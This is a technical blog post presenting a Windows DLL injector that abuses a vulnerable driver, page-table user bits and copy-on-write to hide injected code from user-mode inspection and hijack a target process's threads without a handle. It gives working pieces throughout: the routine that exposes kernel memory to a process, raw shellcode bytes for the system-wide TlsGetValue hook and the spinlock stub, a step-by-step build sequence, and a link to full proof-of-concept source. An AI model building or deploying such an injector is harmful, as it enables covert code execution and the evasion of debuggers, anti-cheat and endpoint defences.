Making the Perfect Injector: Abusing Windows Address Sanitization and CoW
By the end of this post, I aim to make an injector unlike any other: one that by design makes your DLL not debuggable from UM, makes your pages invisible to NtQueryVirtualMemory and NtReadVirtualMemory, and lets you execute code in target process without even having a valid handle; and while doing this I want it to be compatible with Patchguard, have no kernel driver loaded while the target is running and require no handle at all.
Now, this may seem like a stupidly complicated goal, however, it is in fact really simple because Windows will be helping us.
(Source code can be found at the bottom)
0x1: Abusing Windows Address Sanitization
Anyone who has opened ntoskrnl.exe in IDA probably noticed these checks:
1__int64 __usercall MiReadWriteVirtualMemory@<rax>(ULONG_PTR BugCheckParameter1@<rcx>, unsigned __int64 a2@<rdx>, unsigned __int64 a3@<r8>, __int64 a4@<r9>, __int64 a5, int a6)
2{
3 ...
4 if ( v10 < a3 || v9 > 0x7FFFFFFEFFFFi64 || v10 > 0x7FFFFFFEFFFFi64 )
5 return 0xC0000005i64;
6 ...
7}
8__int64 __fastcall MmQueryVirtualMemory(__int64 a1, unsigned __int64 a2, __int64 a3, unsigned __int64 a4, unsigned __int64 a5, unsigned __int64 *a6)
9{
10 ...
11 if ( v12 > 0x7FFFFFFEFFFFi64 )
12 return 0xC000000Di64;
13 ...
14}
Okay so what is so interesting about these you might be asking right now, 0x7FFFFFFEFFFF marks the end of user-mode memory so they are obviously there to make sure it doesn’t leak kernel memory to user-mode.
Here’s what makes them so interesting: these constants are hard-coded by the operating systems and are NOT what the processor actually uses to decide whether a page is accessible from cpl3 or not.
In case you are not familiar with page tables, here’s how virtual memory works:
The first 12 bits (&0xFFF) of a virtual address indicates the offset from the resolved page, the next four 9 bit combinations (&0x1FF000, &0x3FE00000, &0x7FC0000000, &0xFF8000000000) indicate the indices of the entry in the page table, page directory, page directory pointer and page map level4 respectively. These entries, apart from linking to the lower level also contain certain flags like write disable, execute disable, etc; as you can see from the definitions below.
1#pragma pack(push, 1)
2typedef union CR3_
3{
4 uint64_t value;
5 struct
6 {
7 uint64_t ignored_1 : 3;
8 uint64_t write_through : 1;
9 uint64_t cache_disable : 1;
10 uint64_t ignored_2 : 7;
11 uint64_t pml4_p : 40;
12 uint64_t reserved : 12;
13 };
14} PTE_CR3;
15
16typedef union VIRT_ADDR_
17{
18 uint64_t value;
19 void *pointer;
20 struct
21 {
22 uint64_t offset : 12;
23 uint64_t pt_index : 9;
24 uint64_t pd_index : 9;
25 uint64_t pdpt_index : 9;
26 uint64_t pml4_index : 9;
27 uint64_t reserved : 16;
28 };
29} VIRT_ADDR;
30
31typedef uint64_t PHYS_ADDR;
32
33typedef union PML4E_
34{
35 uint64_t value;
36 struct
37 {
38 uint64_t present : 1;
39 uint64_t rw : 1;
40 uint64_t user : 1;
41 uint64_t write_through : 1;
42 uint64_t cache_disable : 1;
43 uint64_t accessed : 1;
44 uint64_t ignored_1 : 1;
45 uint64_t reserved_1 : 1;
46 uint64_t ignored_2 : 4;
47 uint64_t pdpt_p : 40;
48 uint64_t ignored_3 : 11;
49 uint64_t xd : 1;
50 };
51} PML4E;
52
53typedef union PDPTE_
54{
55 uint64_t value;
56 struct
57 {
58 uint64_t present : 1;
59 uint64_t rw : 1;
60 uint64_t user : 1;
61 uint64_t write_through : 1;
62 uint64_t cache_disable : 1;
63 uint64_t accessed : 1;
64 uint64_t dirty : 1;
65 uint64_t page_size : 1;
66 uint64_t ignored_2 : 4;
67 uint64_t pd_p : 40;
68 uint64_t ignored_3 : 11;
69 uint64_t xd : 1;
70 };
71} PDPTE;
72
73typedef union PDE_
74{
75 uint64_t value;
76 struct
77 {
78 uint64_t present : 1;
79 uint64_t rw : 1;
80 uint64_t user : 1;
81 uint64_t write_through : 1;
82 uint64_t cache_disable : 1;
83 uint64_t accessed : 1;
84 uint64_t dirty : 1;
85 uint64_t page_size : 1;
86 uint64_t ignored_2 : 4;
87 uint64_t pt_p : 40;
88 uint64_t ignored_3 : 11;
89 uint64_t xd : 1;
90 };
91} PDE;
92
93typedef union PTE_
94{
95 uint64_t value;
96 VIRT_ADDR vaddr;
97 struct
98 {
99 uint64_t present : 1;
100 uint64_t rw : 1;
101 uint64_t user : 1;
102 uint64_t write_through : 1;
103 uint64_t cache_disable : 1;
104 uint64_t accessed : 1;
105 uint64_t dirty : 1;
106 uint64_t pat : 1;
107 uint64_t global : 1;
108 uint64_t ignored_1 : 3;
109 uint64_t page_frame : 40;
110 uint64_t ignored_3 : 11;
111 uint64_t xd : 1;
112 };
113} PTE;
114#pragma pack(pop)
The flag that interests us is the .user one, the user/supervisor flag gets to decide whether a memory region is accessible from user-mode. So in contrast to what people think, the microcode for these checks would be something like this:
1Pte->user & Pde->user & Pdpte->user & Pml4e->user
instead of
1Va >= 0xFFFFFFFF80000000
Doesn’t this sound abusable to you? Because it definitely is. We will be using it to create a page that is invisible to all user-mode APIs in our case which is as simple to do as:
1BOOL ExposeKernelMemoryToProcess( MemoryController& Mc, PVOID Memory, SIZE_T Size, uint64_t EProcess )
2{
3 Mc.AttachTo( EProcess );
4
5 BOOL Success = TRUE;
6
7 Mc.IterPhysRegion( Memory, Size, [ & ] ( PVOID Va, uint64_t Pa, SIZE_T Sz )
8 {
9 auto Info = Mc.QueryPageTableInfo( Va );
10
11 Info.Pml4e->user = TRUE;
12 Info.Pdpte->user = TRUE;
13 Info.Pde->user = TRUE;
14
15 if ( !Info.Pde || ( Info.Pte && ( !Info.Pte->present ) ) )
16 {
17 Success= TRUE;
18 }
19 else
20 {
21 if ( Info.Pte )
22 Info.Pte->user = TRUE;
23 }
24 } );
25
26 Mc.Detach();
27
28 return Success;
29}
30PVOID Memory = AllocateKernelMemory( CpCtx, KrCtx, Size );
31ExposeKernelMemoryToProcess( Controller, Memory, Size, Controller.CurrentEProcess );
32ZeroMemory( Memory, Size );
Voila, now we have our super-secret page. (I am using a wrapper I made for physical memory access before so if you want to see how the linear translation or the resolving of page table entries are implemented you can check that out.)
0x2: Abusing Copy-on-Write
Now that we are done with hiding the memory, all that is left to do is actually execute it and to do that we will be abusing Copy-on-Write this time.
CoW is a technique used by operating systems to save memory by making processes share certain physical memory regions until they actually get edited.
We know that ntdll.dll gets loaded for every process and its code (.text) region is rarely modified if at all, so why allocate physical memory for it again and again for hundreds of processes? That is exactly why modern operating systems use the technique called CoW.
The implementation is very simple:
- When a PE file gets mapped, if it was mapped to some other process too and its VA is free on the current process as well, simply copy the PFN and set the flag to make it read-only.
- When a PageFault occurs due to an instruction trying to write on the page, allocate new physical memory, set the PFN of the PTE and remove the read-only flag.
This means that when we hook the DLL by using physical memory we actually end up creating a system-wide hook.
How can we hijack a thread with this?
Well, let’s pick a commonly called function and hook it: TlsGetValue.
Now, the PML4E changes from process to process so the kernel memory we exposed are not accessible from all processes, so we need to find a padding in KERNEL32.dll to check for the pid before we just jump to our stub in our lovely kernel page.
The pid check will be very simple:
1std::vector<BYTE> PidBasedHook =
2{
3 0x65, 0x48, 0x8B, 0x04, 0x25, 0x30, 0x00, 0x00, 0x00, // mov rax, gs:[0x30]
4 0x8B, 0x40, 0x40, // mov eax,[rax+0x40] ; pid
5 0x3D, 0xDD, 0xCC, 0xAB, 0x0A, // cmp eax, TargetPid
6 0x0F, 0x85, 0x00, 0x00, 0x00, 0x00, // jne 0xAABBCC
7 0x48, 0xB8, 0xAA, 0xEE, 0xDD, 0xCC, 0xBB, 0xAA, 0x00, 0x00, // mov rax, KernelMemory
8 0xFF, 0xE0 // jmp rax
9};
As PE regions are always 0x1000 aligned, finding a 35-byte padding will be a piece of cake, as long as we look for 0x00 (page padding) and not 0xCC/0x90 (intra-function padding).
In the execution stub, we will have to do some tricks as well. We only want one thread to execute our code, we want to unhook TlsGetValue before we continue execution and I noticed that sometimes the changes in physical memory didn’t instantly have an effect on instructions executed and we want to make sure they are applied, so we will implement three checks at the beginning of the stub.
1std::vector<BYTE> Prologue =
2{
3 0x00, 0x00, // data
4 0xF0, 0xFE, 0x05, 0xF8, 0xFF, 0xFF, 0xFF, // lock inc byte ptr [rip-n]
5 // wait_lock:
6 0x80, 0x3D, 0xF0, 0xFF, 0xFF, 0xFF, 0x00, // cmp byte ptr [rip-m], 0x0
7 0xF3, 0x90, // pause
8 0x74, 0xF5, // je wait_lock
9
10 0x48, 0xB8, 0xAA, 0xEE, 0xDD, 0xCC, 0xBB, 0xAA, 0x00, 0x00, // mov rax, 0xAABBCCDDEEAA
11 // data_sync_lock:
12 0x0F, 0x0D, 0x08, // prefetchw [rax]
13 0x81, 0x38, 0xDD, 0xCC, 0xBB, 0xAA, // cmp dword ptr[rax], 0xAABBCCDD
14 0xF3, 0x90, // pause
15 0x75, 0xF3, // jne data_sync_lock
16
17 0xF0, 0xFE, 0x0D, 0xCF, 0xFF, 0xFF, 0xFF, // lock dec byte ptr [rip-n]
18 0x75, 0x41, // jnz continue_exec
19 0x53, // --- start executing DllMain ---
The first spinlock, wait_lock is to make sure the threads entering this stub stall execution until we let it continue from our injector. The second spinlock, data_sync_lock is to make sure the old TlsGetValue data is written back before continuing execution. The final atomic instruction, lock dec, is the complementary part for the lock inc at the beginning of the stub; lock inc stored the amount of threads waiting in the spinlock, and the lock dec atomically decrements this count; as it does that if the value hits zero zero-flag is set and as this operation is atomic this is done only once so we check the zero-flag to decide whether we execute DllMain or continue execution.
Now that we have all tricks set-up, the implementation of the actual injector is very simple:
- Load vulnerable driver
- Map physical memory to user-mode
- Search for certain offsets (UniqueProcessId, DirectoryTableBase, ActiveProcessLinks)
- Save current EProcess and CR3 values for user-mode use
- Allocate enough kernel pool memory for our injector stub and image
- Unload vulnerable driver
- Map our image to the kernel memory (Fix .relocs and create a stub that gets the imports for us as I cannot bother reading EProcess->Peb)
- Wait for target process
- Expose the kernel page to target process
- Hook TlsGetValue system-wide and make it check for pid before jumping to our stub at kernel memory
- Wait for Stub->SpinningThreadCount to be non zero
- Unhook TlsGetValue, set Stub->Free = TRUE
- Profit.
Source code: https://github.com/can1357/ThePerfectInjector
Forgive me for the hasty image mapping implementation, and the debug code left if there is any. This is meant to be a PoC rather than a ready to go pasta.